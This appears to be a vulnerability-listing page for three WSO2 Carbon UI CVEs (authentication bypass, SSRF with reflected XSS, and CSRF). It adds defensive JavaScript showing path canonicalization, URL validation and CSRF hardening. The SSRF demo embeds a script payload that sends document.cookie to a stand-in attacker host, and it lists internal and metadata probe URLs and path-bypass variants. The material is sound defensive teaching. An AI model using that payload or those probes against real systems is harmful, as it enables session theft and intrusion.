WSO2 org.wso2.carbon:org.wso2.carbon.ui vulnerabilities
3 known vulnerabilities affecting wso2/org.wso2.carbon_org.wso2.carbon.ui.
Total CVEs: 3
CISA KEV: 0
Public exploits: 2
Exploited in wild: 1
Severity breakdown: HIGH 1, MEDIUM 2
Vulnerabilities
CVE-2025-5605 [MEDIUM] CWE-290 | P1 | CVSS 5.3 | Exploited, PoC | affected: ≥ 4.5.3, < 4.5.3.40; ≥ 4.6.0, < 4.6.0.1224; +12 more | 2025-10-24
An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics.
Source: NVD
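The advisory above does not say which URI manipulation CVE-2025-5605 relies on, so the following is an added illustration of the general class, not WSO2 code and not the actual bypass: an authentication or authorization filter that pattern-matches the request-target exactly as received, while the servlet router downstream resolves dot-segments, matrix parameters, repeated slashes and percent-encoding before picking the resource. The protected prefix and the request variants are constructed for the demo.

```javascript
// Added example, not WSO2 code. A filter that matches on the raw request-target
// can be sidestepped by URI variants that the router later resolves to the same
// protected resource. Canonicalize first, then decide. Prefixes are hypothetical.

const PROTECTED_PREFIXES = ["/admin/"];

// Naive filter: string-prefix match on the request-target exactly as received.
function isProtectedRaw(target) {
  return PROTECTED_PREFIXES.some((p) => target.startsWith(p));
}

// Canonicalize the way the router will see the path before any security
// decision: strip query/fragment, drop matrix parameters on every segment
// (";jsessionid=...", "..;/"), percent-decode once and reject anything that is
// still encoded (double encoding), collapse repeated slashes, and resolve "."
// and ".." segments. Throws on input it refuses to reason about.
function canonicalPath(target) {
  let path = target.split(/[?#]/, 1)[0];
  path = path.replace(/;[^/]*/g, "");
  const decoded = decodeURIComponent(path);        // throws URIError on a bad %xx
  if (decoded !== decodeURIComponent(decoded)) {
    throw new Error("double-encoded path rejected: " + target);
  }
  path = decoded.replace(/\/{2,}/g, "/");
  const out = [];
  for (const seg of path.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  const trailing = path.endsWith("/") && out.length > 0 ? "/" : "";
  return "/" + out.join("/") + trailing;
}

function isProtectedCanonical(target) {
  return PROTECTED_PREFIXES.some((p) => canonicalPath(target).startsWith(p));
}

// Constructed request-targets that all reach /admin/stats after routing.
const VARIANTS = [
  "/admin/stats",
  "/public/../admin/stats",
  "/public/..;/admin/stats",
  "//admin/stats",
  "/%61dmin/stats",
  "/admin;x=1/stats",
  "/admin/stats;jsessionid=deadbeef",
];

// For each variant: what the raw filter decides vs. the canonicalizing one.
function compare() {
  return VARIANTS.map((t) => ({
    target: t,
    canonical: canonicalPath(t),
    raw: isProtectedRaw(t),
    canonicalized: isProtectedCanonical(t),
  }));
}

if (typeof require !== "undefined" && require.main === module) console.table(compare());
```

Only the two variants that literally begin with "/admin/" trip the raw filter; every variant is caught once the path is canonicalized. The safest arrangement is to let the same component that routes the request also make the access decision, so there is no second parser to disagree with; where a separate filter is unavoidable, it must reject rather than guess on anything it cannot canonicalize, which is what the double-encoding check does here.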
CVE-2025-5350 [MEDIUM] CWE-79 | P4 | CVSS 4.8 | PoC | affected: ≥ 4.5.3, < 4.5.3.41; ≥ 4.6.0, < 4.6.0.1087; +12 more | 2025-10-24
SSRF and reflected XSS vulnerabilities exist in multiple WSO2 products within the deprecated Try-It feature, which was accessible only to administrative users. This feature accepted user-supplied URLs without proper validation, leading to server-side request forgery (SSRF). Additionally, the retrieved content was directly reflected in the HTTP response,
Source: NVD
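The two controls such a "fetch this URL and show me the response" feature needs, as an added example that is not WSO2 code and not the Try-It implementation: validate the target before the server fetches it (the SSRF half), and encode the fetched body before reflecting it to the administrator's browser (the XSS half). The allowlist host, the hostile response body and the sample URLs are constructed.

```javascript
// Added example, not WSO2 code: SSRF target validation plus safe reflection of
// fetched content. ALLOWED_HOSTS and HOSTILE_BODY are constructed for the demo.

const ALLOWED_HOSTS = new Set(["api.example"]);   // hypothetical: hosts the feature may call

// Private / loopback / link-local IPv4 ranges, dotted-quad form only.
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Returns the normalized URL string to fetch, or throws with the reason.
// allowedHosts === null means "any public host" (denylist only); a Set means a
// strict allowlist, with the denylist kept as defence in depth.
function validateTarget(input, allowedHosts = ALLOWED_HOSTS) {
  let url;
  try { url = new URL(input); } catch { throw new Error("malformed URL"); }
  if (url.protocol !== "https:") throw new Error("scheme not allowed: " + url.protocol);
  if (url.username || url.password) throw new Error("credentials in URL not allowed");
  const host = url.hostname;   // WHATWG parsing normalizes forms such as 2130706433 or 0x7f000001 to 127.0.0.1
  if (host.startsWith("[")) throw new Error("IPv6 literal not allowed");
  if (host === "localhost" || host.endsWith(".localhost")) throw new Error("loopback name not allowed");
  if (isPrivateIPv4(host)) throw new Error("private address not allowed: " + host);
  if (allowedHosts && !allowedHosts.has(host)) throw new Error("host not on allowlist: " + host);
  return url.toString();
}

// Entity-encode everything that could open markup or break out of an attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: the fetched body lands in the page verbatim, so a <script> in it runs
// in the console user's session.
function renderUnsafe(fetchedBody) {
  return { headers: { "Content-Type": "text/html; charset=utf-8" },
           body: "<pre>" + fetchedBody + "</pre>" };
}

// After: encoded body, plus headers that stop the browser from sniffing the
// response into another type or running inline script if encoding is ever missed.
function renderSafe(fetchedBody) {
  return {
    headers: {
      "Content-Type": "text/html; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
      "Content-Security-Policy": "default-src 'none'; style-src 'self'",
    },
    body: "<pre>" + escapeHtml(fetchedBody) + "</pre>",
  };
}

// Constructed content an attacker-controlled target might return.
const HOSTILE_BODY = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

function demo() {
  const outcomes = {};
  for (const t of ["https://api.example/v1/echo?x=1", "https://169.254.169.254/latest/meta-data/",
                   "file:///etc/passwd", "https://localhost:9443/carbon/",
                   "https://user:pw@api.example/", "https://2130706433/"]) {
    try { outcomes[t] = "fetch " + validateTarget(t); } catch (e) { outcomes[t] = "blocked: " + e.message; }
  }
  return {
    outcomes,
    unsafeHasScript: renderUnsafe(HOSTILE_BODY).body.includes("<script"),
    safeHasScript: renderSafe(HOSTILE_BODY).body.includes("<script"),
  };
}
```

Two caveats the validator cannot cover on its own: a hostname that passes the check can still resolve to a private address (DNS rebinding), so the fetch layer should pin the resolved IP it validated, and each redirect hop is a new target that must be validated again or redirects must not be followed at all. An allowlist of hosts, as in the default here, is the control that actually removes the SSRF; the private-range denylist only narrows the blast radius when no allowlist is possible.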
CVE-2025-6670 [HIGH] CWE-352 | P3 | CVSS 8.8 | affected: ≥ 4.5.3, < 4.5.3.50; ≥ 4.6.0, < 4.6.0.2253; +14 more | 2025-11-18
A Cross-Site Request Forgery (CSRF) vulnerability exists in multiple WSO2 products due to the use of the HTTP GET method for state-changing operations within admin services, specifically in the event processor of the Carbon console. Although the SameSite=Lax cookie attribute is used as a mitigation, it is ineffective in this context because it allows co
Source: NVD
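Why SameSite=Lax does not help a GET endpoint that changes state, and what a hardened admin-service handler looks like, as an added example that is not WSO2 code and not the event-processor service itself. The cookie model reduces the browser's rule to the inputs that matter here; the endpoint path, session cookie, synchronizer token and origins are constructed.

```javascript
// Added example, not WSO2 code: a Lax session cookie still accompanies a
// cross-site top-level GET navigation, so a GET that changes state is forgeable.
// Endpoint, cookie, token and origins are hypothetical.

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);

// Browser cookie-attachment rule for one request. A Lax cookie travels with a
// cross-site request when it is a top-level navigation (link click,
// window.location, redirect, <form method=GET>) and the method is "safe".
// Strict never crosses sites; None always does. Subresources such as <img>
// are not navigations and get no Lax cookie.
function cookieAttached({ sameSite, crossSite, method, topLevelNavigation }) {
  if (!crossSite) return true;
  if (sameSite === "Strict") return false;
  if (sameSite === "None") return true;
  return topLevelNavigation && SAFE_METHODS.has(method);   // Lax
}

const CONSOLE_ORIGIN = "https://console.example";           // hypothetical admin console

function makeService({ hardened }) {
  const session = { sameSite: "Lax" };           // the admin's session cookie attributes
  const csrfToken = "tok-9f2c1d";                // hypothetical per-session synchronizer token
  const state = { undeployed: [] };

  // req: { method, path, crossSite, topLevelNavigation, origin, body }
  function handle(req) {
    const hasSession = cookieAttached({ sameSite: session.sameSite, crossSite: req.crossSite,
                                        method: req.method, topLevelNavigation: req.topLevelNavigation });
    if (!hasSession) return 401;                 // no session cookie arrived: not authenticated
    if (!req.path.startsWith("/undeploy/")) return 404;
    if (hardened) {
      if (req.method !== "POST") return 405;     // state change only via POST; Lax never sends on cross-site POST
      if (req.origin !== CONSOLE_ORIGIN) return 403;   // Origin check: defence in depth, also covers SameSite=None
      if (!req.body || req.body.csrfToken !== csrfToken) return 403;   // token bound to the session
    }
    state.undeployed.push(req.path.slice("/undeploy/".length));
    return 200;
  }
  return { handle, csrfToken, state };
}

// Cross-site forgeries: a top-level GET navigation the admin is lured into, and
// an auto-submitting cross-site POST form.
const FORGED_GET  = { method: "GET",  path: "/undeploy/alerts", crossSite: true, topLevelNavigation: true,
                      origin: "https://attacker.example" };
const FORGED_POST = { method: "POST", path: "/undeploy/alerts", crossSite: true, topLevelNavigation: true,
                      origin: "https://attacker.example", body: { csrfToken: "guess" } };

function demo() {
  const weak = makeService({ hardened: false });
  const hard = makeService({ hardened: true });
  const legit = { method: "POST", path: "/undeploy/alerts", crossSite: false, topLevelNavigation: false,
                  origin: CONSOLE_ORIGIN, body: { csrfToken: hard.csrfToken } };
  return {
    weakForgedGet: weak.handle(FORGED_GET),        // 200: Lax cookie rides along, state changes
    hardForgedGet: hard.handle(FORGED_GET),        // 405: GET can no longer change state
    hardForgedPost: hard.handle(FORGED_POST),      // 401: Lax cookie is not attached to a cross-site POST
    hardLegit: hard.handle(legit),                 // 200
    weakUndeployed: weak.state.undeployed.length,  // 1: the forgery took effect
    hardUndeployed: hard.state.undeployed.length,  // 1: only the legitimate request
  };
}
```

The fix that matters is the method change: once a state change is only accepted over POST, a Lax cookie never reaches the forged request and the handler sees an unauthenticated call. The Origin check and the synchronizer token are kept because they do not depend on cookie attributes at all, which is what you want if a client later sets the session cookie with SameSite=None or a browser defaults a cookie with no attribute to Lax-with-exceptions.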